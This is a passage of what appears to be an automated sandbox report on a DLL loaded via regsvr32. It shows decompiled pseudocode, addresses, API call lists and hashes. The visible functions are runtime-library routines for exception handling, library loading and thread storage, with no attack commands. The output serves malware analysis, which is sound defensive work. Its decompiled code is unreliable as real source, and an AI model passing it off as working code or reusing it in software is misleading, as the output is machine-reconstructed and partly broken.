                                                                                                          				if (r13d -  *((intOrPtr*)(_t282 - 0x10)) < 0) goto 0x800034fd;
                                                                                                          				if (( *_t280 & 0x1fffffff) - 0x19930521 < 0) goto 0x80003784;
                                                                                                          				_t209 = _t280[8] - r15d;
                                                                                                          				if (_t209 == 0) goto 0x8000369e;
                                                                                                          				E00000001180002408(_t282 - 8);
                                                                                                          				if (_t209 != 0) goto 0x800036bf;
                                                                                                          				if ((_t280[9] >> 0x00000002 & 0x00000001) == 0) goto 0x80003784;
                                                                                                          				if (E00000001180001FD8(_t280[9] >> 0x00000002 & 0x00000001, _t282 - 8 + _t280[8], _t281, _t280) != 0) goto 0x80003784;
                                                                                                          				if ((_t280[9] >> 0x00000002 & 0x00000001) != 0) goto 0x800037da;
                                                                                                          				if (_t280[8] == r15d) goto 0x800036e4;
                                                                                                          				E00000001180002408(_t282 - 8 + _t280[8]);
                                                                                                          				_t235 = _t280[8];
                                                                                                          				goto 0x800036e7;
                                                                                                          				if (E00000001180004314(_t235, _t237, _t237, _t313, _t281) != 0) goto 0x80003784;
                                                                                                          				E00000001180002068(_t237,  *((intOrPtr*)(_t284 + 0x78)), _t281, _t282, _t280, _t282 - 0x78);
                                                                                                          				_t177 =  *((intOrPtr*)(_t282 + 0x98));
                                                                                                          				 *(_t284 + 0x50) = _t177;
                                                                                                          				_t178 = _t177 | 0xffffffff;
                                                                                                          				 *((long long*)(_t284 + 0x48)) = _t281;
                                                                                                          				 *(_t284 + 0x40) = _t313;
                                                                                                          				 *(_t284 + 0x38) = _t178;
                                                                                                          				 *(_t284 + 0x30) = _t178;
                                                                                                          				 *(_t284 + 0x28) = _t280;
                                                                                                          				 *(_t284 + 0x20) = _t313;
                                                                                                          				E00000001180002274( *((intOrPtr*)(_t284 + 0x78)), _t237,  *((intOrPtr*)(_t284 + 0x68)), _t235);
                                                                                                          				goto 0x80003784;
                                                                                                          				if (_t280[3] <= 0) goto 0x80003784;
                                                                                                          				if ( *((char*)(_t282 + 0x98)) != 0) goto 0x800037f7;
                                                                                                          				 *(_t284 + 0x38) = _t307;
                                                                                                          				 *(_t284 + 0x30) =  *(_t282 + 0xa0);
                                                                                                          				 *(_t284 + 0x28) = r14d;
                                                                                                          				 *(_t284 + 0x20) = _t280;
                                                                                                          				E00000001180003800(_t237, _t237,  *((intOrPtr*)(_t284 + 0x78)), _t313, _t281);
                                                                                                          				_t173 = E00000001180002D40(_t235);
                                                                                                          				if ( *((long long*)(_t235 + 0x38)) != 0) goto 0x800037f7;
                                                                                                          				return E000000011800010B0(_t173, _t178,  *(_t282 + 0x10) ^ _t284);
                                                                                                          			}

































                                                                                                          0x180003328
                                                                                                          0x180003335
                                                                                                          0x18000333a
                                                                                                          0x180003341
                                                                                                          0x180003348
                                                                                                          0x18000334b
                                                                                                          0x18000334f
                                                                                                          0x180003359
                                                                                                          0x180003363
                                                                                                          0x180003368
                                                                                                          0x18000336b
                                                                                                          0x180003376
                                                                                                          0x18000337d
                                                                                                          0x180003382
                                                                                                          0x180003385
                                                                                                          0x18000338a
                                                                                                          0x180003390
                                                                                                          0x180003399
                                                                                                          0x1800033a5
                                                                                                          0x1800033af
                                                                                                          0x1800033c0
                                                                                                          0x1800033cb
                                                                                                          0x1800033d1
                                                                                                          0x1800033db
                                                                                                          0x1800033e1
                                                                                                          0x1800033e6
                                                                                                          0x1800033ea
                                                                                                          0x1800033f3
                                                                                                          0x1800033fc
                                                                                                          0x180003401
                                                                                                          0x18000340c
                                                                                                          0x180003412
                                                                                                          0x18000341f
                                                                                                          0x180003426
                                                                                                          0x18000342c
                                                                                                          0x180003436
                                                                                                          0x180003438
                                                                                                          0x180003441
                                                                                                          0x18000344c
                                                                                                          0x180003458
                                                                                                          0x180003464
                                                                                                          0x18000346a
                                                                                                          0x180003478
                                                                                                          0x18000347c
                                                                                                          0x180003486
                                                                                                          0x180003490
                                                                                                          0x1800034a1
                                                                                                          0x1800034a7
                                                                                                          0x1800034ae
                                                                                                          0x1800034be
                                                                                                          0x1800034c9
                                                                                                          0x1800034ce
                                                                                                          0x1800034d1
                                                                                                          0x1800034d6
                                                                                                          0x1800034da
                                                                                                          0x1800034df
                                                                                                          0x1800034e4
                                                                                                          0x1800034eb
                                                                                                          0x1800034f1
                                                                                                          0x1800034f5
                                                                                                          0x1800034f9
                                                                                                          0x180003508
                                                                                                          0x180003517
                                                                                                          0x180003521
                                                                                                          0x180003524
                                                                                                          0x180003528
                                                                                                          0x18000352f
                                                                                                          0x180003539
                                                                                                          0x180003540
                                                                                                          0x180003546
                                                                                                          0x18000354c
                                                                                                          0x180003554
                                                                                                          0x180003558
                                                                                                          0x18000355f
                                                                                                          0x180003568
                                                                                                          0x18000356c
                                                                                                          0x180003570
                                                                                                          0x180003574
                                                                                                          0x180003578
                                                                                                          0x18000357b
                                                                                                          0x18000358c
                                                                                                          0x18000358f
                                                                                                          0x180003594
                                                                                                          0x1800035a1
                                                                                                          0x1800035a4
                                                                                                          0x1800035aa
                                                                                                          0x1800035ac
                                                                                                          0x1800035c7
                                                                                                          0x1800035d2
                                                                                                          0x1800035d8
                                                                                                          0x1800035de
                                                                                                          0x1800035e0
                                                                                                          0x1800035e6
                                                                                                          0x1800035e8
                                                                                                          0x1800035ee
                                                                                                          0x1800035f4
                                                                                                          0x180003612
                                                                                                          0x18000361a
                                                                                                          0x180003622
                                                                                                          0x18000362d
                                                                                                          0x180003635
                                                                                                          0x18000363e
                                                                                                          0x180003647
                                                                                                          0x18000364c
                                                                                                          0x180003651
                                                                                                          0x180003656
                                                                                                          0x18000365d
                                                                                                          0x180003668
                                                                                                          0x18000366b
                                                                                                          0x180003672
                                                                                                          0x180003684
                                                                                                          0x18000368a
                                                                                                          0x18000368e
                                                                                                          0x180003690
                                                                                                          0x18000369c
                                                                                                          0x1800036a6
                                                                                                          0x1800036b9
                                                                                                          0x1800036c7
                                                                                                          0x1800036d1
                                                                                                          0x1800036d3
                                                                                                          0x1800036db
                                                                                                          0x1800036e2
                                                                                                          0x1800036f1
                                                                                                          0x180003704
                                                                                                          0x180003709
                                                                                                          0x18000371a
                                                                                                          0x18000371e
                                                                                                          0x180003721
                                                                                                          0x180003726
                                                                                                          0x18000372b
                                                                                                          0x18000372f
                                                                                                          0x180003736
                                                                                                          0x18000373b
                                                                                                          0x180003740
                                                                                                          0x180003745
                                                                                                          0x18000374b
                                                                                                          0x180003754
                                                                                                          0x180003763
                                                                                                          0x18000376b
                                                                                                          0x180003772
                                                                                                          0x18000377a
                                                                                                          0x18000377f
                                                                                                          0x180003784
                                                                                                          0x18000378e
                                                                                                          0x1800037af

                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000007.00000002.435175242.0000000180001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                          • Associated: 00000007.00000002.435170036.0000000180000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 00000007.00000002.435186833.0000000180016000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 00000007.00000002.435222239.0000000180021000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 00000007.00000002.435229461.0000000180023000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_7_2_180000000_regsvr32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                                                                          • String ID: csm$csm$csm
                                                                                                          • API String ID: 849930591-393685449
                                                                                                          • Opcode ID: b6b7f02adf660401896063c6a860fb7c8eea0d446ae07e01c980b744b2235902
                                                                                                          • Instruction ID: 68369fba8b053f101f7a0a57f2a328d7db6ec17b1fffbc4fe0a5b608d0144455
                                                                                                          • Opcode Fuzzy Hash: b6b7f02adf660401896063c6a860fb7c8eea0d446ae07e01c980b744b2235902
                                                                                                          • Instruction Fuzzy Hash: C0E1B272604B888AEBA6DF66D4423DD77A4F749BC8F008116FE8957B96CF34D698C700
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          C-Code - Quality: 77%
                                                                                                          			E0000000118000A3DC(void* __ecx, long long __rbx, void* __rdx, signed int __rsi, void* __r8, void* __r9) {
                                                                                                          				void* _t35;
                                                                                                          				signed long long _t56;
                                                                                                          				intOrPtr _t60;
                                                                                                          				void* _t71;
                                                                                                          				signed long long _t72;
                                                                                                          				long long _t78;
                                                                                                          				void* _t82;
                                                                                                          				signed long long _t88;
                                                                                                          				signed long long _t89;
                                                                                                          				signed long long _t90;
                                                                                                          				WCHAR* _t91;
                                                                                                          				long _t94;
                                                                                                          				void* _t97;
                                                                                                          				WCHAR* _t102;
                                                                                                          
                                                                                                          				 *((long long*)(_t82 + 8)) = __rbx;
                                                                                                          				 *((long long*)(_t82 + 0x10)) = _t78;
                                                                                                          				 *((long long*)(_t82 + 0x18)) = __rsi;
                                                                                                          				r15d = __ecx;
                                                                                                          				_t72 = _t71 | 0xffffffff;
                                                                                                          				_t89 =  *0x80021010; // 0x268a0197523d
                                                                                                          				_t88 =  *(0x180000000 + 0x226f0 + _t102 * 8) ^ _t89;
                                                                                                          				asm("dec ecx");
                                                                                                          				if (_t88 == _t72) goto 0x8000a51f;
                                                                                                          				if (_t88 == 0) goto 0x8000a441;
                                                                                                          				_t56 = _t88;
                                                                                                          				goto 0x8000a521;
                                                                                                          				if (__r8 == __r9) goto 0x8000a504;
                                                                                                          				_t60 =  *((intOrPtr*)(0x180000000 + 0x22640 + __rsi * 8));
                                                                                                          				if (_t60 == 0) goto 0x8000a469;
                                                                                                          				if (_t60 != _t72) goto 0x8000a55e;
                                                                                                          				goto 0x8000a4f0;
                                                                                                          				r8d = 0x800;
                                                                                                          				LoadLibraryExW(_t102, _t97, _t94);
                                                                                                          				if (_t56 != 0) goto 0x8000a53e;
                                                                                                          				if (GetLastError() != 0x57) goto 0x8000a4de;
                                                                                                          				_t14 = _t56 - 0x50; // -80
                                                                                                          				_t35 = _t14;
                                                                                                          				r8d = _t35;
                                                                                                          				if (E00000001180007070(__r8) == 0) goto 0x8000a4de;
                                                                                                          				r8d = _t35;
                                                                                                          				if (E00000001180007070(__r8) == 0) goto 0x8000a4de;
                                                                                                          				r8d = 0;
                                                                                                          				LoadLibraryExW(_t91, _t71);
                                                                                                          				if (_t56 != 0) goto 0x8000a53e;
                                                                                                          				 *((intOrPtr*)(0x180000000 + 0x22640 + __rsi * 8)) = _t72;
                                                                                                          				if (__r8 + 4 != __r9) goto 0x8000a44a;
                                                                                                          				_t90 =  *0x80021010; // 0x268a0197523d
                                                                                                          				asm("dec eax");
                                                                                                          				 *(0x180000000 + 0x226f0 + _t102 * 8) = _t72 ^ _t90;
                                                                                                          				return 0;
                                                                                                          			}

















                                                                                                          0x18000a3dc
                                                                                                          0x18000a3e1
                                                                                                          0x18000a3e6
                                                                                                          0x18000a3f8
                                                                                                          0x18000a402
                                                                                                          0x18000a418
                                                                                                          0x18000a41f
                                                                                                          0x18000a428
                                                                                                          0x18000a42e
                                                                                                          0x18000a437
                                                                                                          0x18000a439
                                                                                                          0x18000a43c
                                                                                                          0x18000a444
                                                                                                          0x18000a44d
                                                                                                          0x18000a459
                                                                                                          0x18000a45e
                                                                                                          0x18000a464
                                                                                                          0x18000a476
                                                                                                          0x18000a47c
                                                                                                          0x18000a488
                                                                                                          0x18000a497
                                                                                                          0x18000a499
                                                                                                          0x18000a499
                                                                                                          0x18000a49f
                                                                                                          0x18000a4b0
                                                                                                          0x18000a4b2
                                                                                                          0x18000a4c6
                                                                                                          0x18000a4c8
                                                                                                          0x18000a4d0
                                                                                                          0x18000a4dc
                                                                                                          0x18000a4e8
                                                                                                          0x18000a4f7
                                                                                                          0x18000a4fd
                                                                                                          0x18000a511
                                                                                                          0x18000a517
                                                                                                          0x18000a53d

                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000007.00000002.435175242.0000000180001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                          • Associated: 00000007.00000002.435170036.0000000180000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 00000007.00000002.435186833.0000000180016000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 00000007.00000002.435222239.0000000180021000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 00000007.00000002.435229461.0000000180023000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_7_2_180000000_regsvr32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: AddressFreeLibraryProc
                                                                                                          • String ID: api-ms-$ext-ms-
                                                                                                          • API String ID: 3013587201-537541572
                                                                                                          • Opcode ID: 4973cf4a17c5a6c0ea837db478b6f4f53bca8011a61d94df8f11c1c7fa6ad517
                                                                                                          • Instruction ID: 4cb29e05f73c92bcfdeebd25cdbb701ff5eb44b215489781f60aaecc25d2491e
                                                                                                          • Opcode Fuzzy Hash: 4973cf4a17c5a6c0ea837db478b6f4f53bca8011a61d94df8f11c1c7fa6ad517
                                                                                                          • Instruction Fuzzy Hash: ED41D032715A0856FBA7CB16AC047D53391B78EBE0F09C225BD1D47798EE38C64D8300
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          C-Code - Quality: 50%
                                                                                                          			E000000011800045BC(void* __ecx, long long __rbx, void* __rdx, signed int __rsi, void* __r8, void* __r9) {
                                                                                                          				intOrPtr _t61;
                                                                                                          				intOrPtr _t65;
                                                                                                          				intOrPtr _t67;
                                                                                                          				intOrPtr _t68;
                                                                                                          				struct HINSTANCE__* _t81;
                                                                                                          				long long _t85;
                                                                                                          				void* _t89;
                                                                                                          				struct HINSTANCE__* _t94;
                                                                                                          				long _t97;
                                                                                                          				void* _t100;
                                                                                                          				signed long long _t101;
                                                                                                          				WCHAR* _t104;
                                                                                                          
                                                                                                          				 *((long long*)(_t89 + 8)) = __rbx;
                                                                                                          				 *((long long*)(_t89 + 0x10)) = _t85;
                                                                                                          				 *((long long*)(_t89 + 0x18)) = __rsi;
                                                                                                          				_t101 = _t100 | 0xffffffff;
                                                                                                          				_t61 =  *((intOrPtr*)(0x180000000 + 0x22208 + _t81 * 8));
                                                                                                          				if (_t61 == _t101) goto 0x800046eb;
                                                                                                          				if (_t61 != 0) goto 0x800046ed;
                                                                                                          				if (__r8 == __r9) goto 0x800046e3;
                                                                                                          				_t67 =  *((intOrPtr*)(0x180000000 + 0x221f0 + __rsi * 8));
                                                                                                          				if (_t67 == 0) goto 0x8000462e;
                                                                                                          				if (_t67 != _t101) goto 0x800046c5;
                                                                                                          				goto 0x80004699;
                                                                                                          				r8d = 0x800;
                                                                                                          				LoadLibraryExW(_t104, _t100, _t97);
                                                                                                          				_t68 = _t61;
                                                                                                          				if (_t61 != 0) goto 0x800046a5;
                                                                                                          				if (GetLastError() != 0x57) goto 0x80004687;
                                                                                                          				_t14 = _t68 + 7; // 0x7
                                                                                                          				r8d = _t14;
                                                                                                          				if (E00000001180007070(__r8) == 0) goto 0x80004687;
                                                                                                          				r8d = 0;
                                                                                                          				LoadLibraryExW(??, ??, ??);
                                                                                                          				if (_t61 != 0) goto 0x800046a5;
                                                                                                          				 *((intOrPtr*)(0x180000000 + 0x221f0 + __rsi * 8)) = _t101;
                                                                                                          				goto 0x8000460c;
                                                                                                          				_t21 = 0x180000000 + 0x221f0 + __rsi * 8;
                                                                                                          				_t65 =  *_t21;
                                                                                                          				 *_t21 = _t61;
                                                                                                          				if (_t65 == 0) goto 0x800046c5;
                                                                                                          				FreeLibrary(_t94);
                                                                                                          				GetProcAddress(_t81);
                                                                                                          				if (_t65 == 0) goto 0x800046e3;
                                                                                                          				 *((intOrPtr*)(0x180000000 + 0x22208 + _t81 * 8)) = _t65;
                                                                                                          				goto 0x800046ed;
                                                                                                          				 *((intOrPtr*)(0x180000000 + 0x22208 + _t81 * 8)) = _t101;
                                                                                                          				return 0;
                                                                                                          			}















                                                                                                          0x1800045bc
                                                                                                          0x1800045c1
                                                                                                          0x1800045c6
                                                                                                          0x1800045e1
                                                                                                          0x1800045ee
                                                                                                          0x1800045fa
                                                                                                          0x180004603
                                                                                                          0x18000460c
                                                                                                          0x180004615
                                                                                                          0x180004621
                                                                                                          0x180004626
                                                                                                          0x18000462c
                                                                                                          0x18000463b
                                                                                                          0x180004641
                                                                                                          0x180004647
                                                                                                          0x18000464d
                                                                                                          0x180004658
                                                                                                          0x18000465a
                                                                                                          0x18000465a
                                                                                                          0x18000466f
                                                                                                          0x180004671
                                                                                                          0x180004679
                                                                                                          0x180004685
                                                                                                          0x180004691
                                                                                                          0x1800046a0
                                                                                                          0x1800046af
                                                                                                          0x1800046af
                                                                                                          0x1800046af
                                                                                                          0x1800046ba
                                                                                                          0x1800046bf
                                                                                                          0x1800046cb
                                                                                                          0x1800046d4
                                                                                                          0x1800046d9
                                                                                                          0x1800046e1
                                                                                                          0x1800046e3
                                                                                                          0x180004709

                                                                                                          APIs
                                                                                                          • LoadLibraryExW.KERNEL32(?,?,00000000,00000001800047C3,?,?,?,0000000180002D8E,?,?,?,0000000180002A39), ref: 0000000180004641
                                                                                                          • GetLastError.KERNEL32(?,?,00000000,00000001800047C3,?,?,?,0000000180002D8E,?,?,?,0000000180002A39), ref: 000000018000464F
                                                                                                          • LoadLibraryExW.KERNEL32(?,?,00000000,00000001800047C3,?,?,?,0000000180002D8E,?,?,?,0000000180002A39), ref: 0000000180004679
                                                                                                          • FreeLibrary.KERNEL32(?,?,00000000,00000001800047C3,?,?,?,0000000180002D8E,?,?,?,0000000180002A39), ref: 00000001800046BF
                                                                                                          • GetProcAddress.KERNEL32(?,?,00000000,00000001800047C3,?,?,?,0000000180002D8E,?,?,?,0000000180002A39), ref: 00000001800046CB
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000007.00000002.435175242.0000000180001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                          • Associated: 00000007.00000002.435170036.0000000180000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 00000007.00000002.435186833.0000000180016000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 00000007.00000002.435222239.0000000180021000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 00000007.00000002.435229461.0000000180023000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_7_2_180000000_regsvr32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Library$Load$AddressErrorFreeLastProc
                                                                                                          • String ID: api-ms-
                                                                                                          • API String ID: 2559590344-2084034818
                                                                                                          • Opcode ID: d92b391dc074c551f2fff15d3caa28434169fc5b46989934520673f65e9ea010
                                                                                                          • Instruction ID: a281eee05f5572a15ea3fe0403c4f12dabc44bbec878773a6143b276462e3048
                                                                                                          • Opcode Fuzzy Hash: d92b391dc074c551f2fff15d3caa28434169fc5b46989934520673f65e9ea010
                                                                                                          • Instruction Fuzzy Hash: 9F31F276302B48A1EE93DB02A8007D533E4B70DBE4F598625BE2D0B3A0EF39C24C8705
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000007.00000002.435175242.0000000180001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                          • Associated: 00000007.00000002.435170036.0000000180000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 00000007.00000002.435186833.0000000180016000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 00000007.00000002.435222239.0000000180021000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 00000007.00000002.435229461.0000000180023000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_7_2_180000000_regsvr32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Value$ErrorLast
                                                                                                          • String ID:
                                                                                                          • API String ID: 2506987500-0
                                                                                                          • Opcode ID: 5bc48b536716d6500d6b4fd732b8b14869dbb673373b5a9a242e628548633fb8
                                                                                                          • Instruction ID: c3c6b15d1e2a8e36adeeaa1ee2c0ab8803bf36c1bad1bc725f34006b2089cb00
                                                                                                          • Opcode Fuzzy Hash: 5bc48b536716d6500d6b4fd732b8b14869dbb673373b5a9a242e628548633fb8
                                                                                                          • Instruction Fuzzy Hash: A5214F3470668C42FAE7E73195553ED72926B6C7F0F58C624B83A07BDBDE6C8A494700
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000007.00000002.435175242.0000000180001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                          • Associated: 00000007.00000002.435170036.0000000180000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 00000007.00000002.435186833.0000000180016000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 00000007.00000002.435222239.0000000180021000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 00000007.00000002.435229461.0000000180023000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_7_2_180000000_regsvr32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                                                                          • String ID: CONOUT$
                                                                                                          • API String ID: 3230265001-3130406586
                                                                                                          • Opcode ID: 5f84935fb18113dc5388fb9af56135c4a8d61c8a22428d4b494f05fe971ce8aa
                                                                                                          • Instruction ID: 0de398e34c1669cec19602a54f8a011ae7faefe96049ea3591aa14d2bab58b4a
                                                                                                          • Opcode Fuzzy Hash: 5f84935fb18113dc5388fb9af56135c4a8d61c8a22428d4b494f05fe971ce8aa
                                                                                                          • Instruction Fuzzy Hash: 7F115B31610F4886E7939B52F85439A73A0F79CBE4F048225FA5E87BA4CF78CA488740
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          APIs
                                                                                                          • GetLastError.KERNEL32(?,?,0000268A0197523D,00000001800086FD,?,?,?,?,000000018000D08A,?,?,00000000,000000018000A3A3,?,?,?), ref: 0000000180007F3F
                                                                                                          • FlsSetValue.KERNEL32(?,?,0000268A0197523D,00000001800086FD,?,?,?,?,000000018000D08A,?,?,00000000,000000018000A3A3,?,?,?), ref: 0000000180007F75
                                                                                                          • FlsSetValue.KERNEL32(?,?,0000268A0197523D,00000001800086FD,?,?,?,?,000000018000D08A,?,?,00000000,000000018000A3A3,?,?,?), ref: 0000000180007FA2
                                                                                                          • FlsSetValue.KERNEL32(?,?,0000268A0197523D,00000001800086FD,?,?,?,?,000000018000D08A,?,?,00000000,000000018000A3A3,?,?,?), ref: 0000000180007FB3
                                                                                                          • FlsSetValue.KERNEL32(?,?,0000268A0197523D,00000001800086FD,?,?,?,?,000000018000D08A,?,?,00000000,000000018000A3A3,?,?,?), ref: 0000000180007FC4
                                                                                                          • SetLastError.KERNEL32(?,?,0000268A0197523D,00000001800086FD,?,?,?,?,000000018000D08A,?,?,00000000,000000018000A3A3,?,?,?), ref: 0000000180007FDF
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000007.00000002.435175242.0000000180001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                          • Associated: 00000007.00000002.435170036.0000000180000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 00000007.00000002.435186833.0000000180016000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 00000007.00000002.435222239.0000000180021000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 00000007.00000002.435229461.0000000180023000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_7_2_180000000_regsvr32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Value$ErrorLast
                                                                                                          • String ID:
                                                                                                          • API String ID: 2506987500-0
                                                                                                          • Opcode ID: eb8af4af359d96366aaa10eae491533e56ca08d7f11ac2249f998e933b1e40b3
                                                                                                          • Instruction ID: b3640c739d53f521f3aff5ec24f9b4829142f54ff52cb57a8f227eaee239dcc8
                                                                                                          • Opcode Fuzzy Hash: eb8af4af359d96366aaa10eae491533e56ca08d7f11ac2249f998e933b1e40b3
                                                                                                          • Instruction Fuzzy Hash: 72115C3070964942FAEBE32195453F972926B9C7F0F18C625B83A077DBDE68C6498701
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000007.00000002.435175242.0000000180001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                          • Associated: 00000007.00000002.435170036.0000000180000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 00000007.00000002.435186833.0000000180016000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 00000007.00000002.435222239.0000000180021000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 00000007.00000002.435229461.0000000180023000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_7_2_180000000_regsvr32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: LoadMessage$StringTranslate$AcceleratorClassCreateCursorDispatchRegisterWindow
                                                                                                          • String ID:
                                                                                                          • API String ID: 1967609040-0
                                                                                                          • Opcode ID: 75c1782b7f7e477433b17d4cbabed80ab7ba6ec157a4fc5f42b14144684d98ab
                                                                                                          • Instruction ID: 677205889e0bc738131920ca4d71d6e0d0c6d5bcb4ac294ec7d30bf60c9b59c6
                                                                                                          • Opcode Fuzzy Hash: 75c1782b7f7e477433b17d4cbabed80ab7ba6ec157a4fc5f42b14144684d98ab
                                                                                                          • Instruction Fuzzy Hash: 8611B932614E89D2E7A2DB61F8517DA7361F7D8784F508121FA8947A79DF3CC7198B00
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          C-Code - Quality: 63%
                                                                                                          			E00000001180003B5C(void* __esi, long long __rbx, intOrPtr* __rcx, void* __rdx, long long __rdi, long long __rsi, long long __rbp, void* __r8, void* __r9, void* _a8, void* _a16, void* _a24, void* _a32, signed int* _a40, char _a48, signed int _a56, signed int _a64) {
                                                                                                          				signed int _v32;
                                                                                                          				long long _v40;
                                                                                                          				char _v48;
                                                                                                          				signed int* _v56;
                                                                                                          				void* _t55;
                                                                                                          				intOrPtr _t60;
                                                                                                          				signed int _t101;
                                                                                                          				void* _t109;
                                                                                                          				intOrPtr _t111;
                                                                                                          				signed int* _t115;
                                                                                                          				intOrPtr* _t136;
                                                                                                          				void* _t139;
                                                                                                          				void* _t142;
                                                                                                          				void* _t144;
                                                                                                          				void* _t158;
                                                                                                          				void* _t159;
                                                                                                          
                                                                                                          				_t109 = _t144;
                                                                                                          				 *((long long*)(_t109 + 8)) = __rbx;
                                                                                                          				 *((long long*)(_t109 + 0x10)) = __rbp;
                                                                                                          				 *((long long*)(_t109 + 0x18)) = __rsi;
                                                                                                          				 *((long long*)(_t109 + 0x20)) = __rdi;
                                                                                                          				_t136 = __rcx;
                                                                                                          				_t139 = __r9;
                                                                                                          				_t159 = __r8;
                                                                                                          				_t142 = __rdx;
                                                                                                          				E00000001180004584(_t55, __r8);
                                                                                                          				E00000001180002D40(_t109);
                                                                                                          				_t115 = _a40;
                                                                                                          				if ( *((intOrPtr*)(_t109 + 0x40)) != 0) goto 0x80003bde;
                                                                                                          				if ( *__rcx == 0xe06d7363) goto 0x80003bde;
                                                                                                          				if ( *__rcx != 0x80000029) goto 0x80003bc2;
                                                                                                          				if ( *((intOrPtr*)(__rcx + 0x18)) != 0xf) goto 0x80003bc6;
                                                                                                          				if ( *((long long*)(__rcx + 0x60)) == 0x19930520) goto 0x80003bde;
                                                                                                          				if ( *__rcx == 0x80000026) goto 0x80003bde;
                                                                                                          				if (( *_t115 & 0x1fffffff) - 0x19930522 < 0) goto 0x80003bde;
                                                                                                          				if ((_t115[9] & 0x00000001) != 0) goto 0x80003d6d;
                                                                                                          				if (( *(__rcx + 4) & 0x00000066) == 0) goto 0x80003c76;
                                                                                                          				if (_t115[1] == 0) goto 0x80003d6d;
                                                                                                          				if (_a48 != 0) goto 0x80003d6d;
                                                                                                          				if (( *(__rcx + 4) & 0x00000020) == 0) goto 0x80003c63;
                                                                                                          				if ( *__rcx != 0x80000026) goto 0x80003c41;
                                                                                                          				_t60 = E00000001180002F2C(_t115, __r9,  *((intOrPtr*)(__r9 + 0x20)), __r9);
                                                                                                          				if (_t60 - 0xffffffff < 0) goto 0x80003d8d;
                                                                                                          				if (_t60 - _t115[1] >= 0) goto 0x80003d8d;
                                                                                                          				r9d = _t60;
                                                                                                          				E000000011800040F0(_t109, _t142, __r9, _t115);
                                                                                                          				goto 0x80003d6d;
                                                                                                          				if ( *_t136 != 0x80000029) goto 0x80003c63;
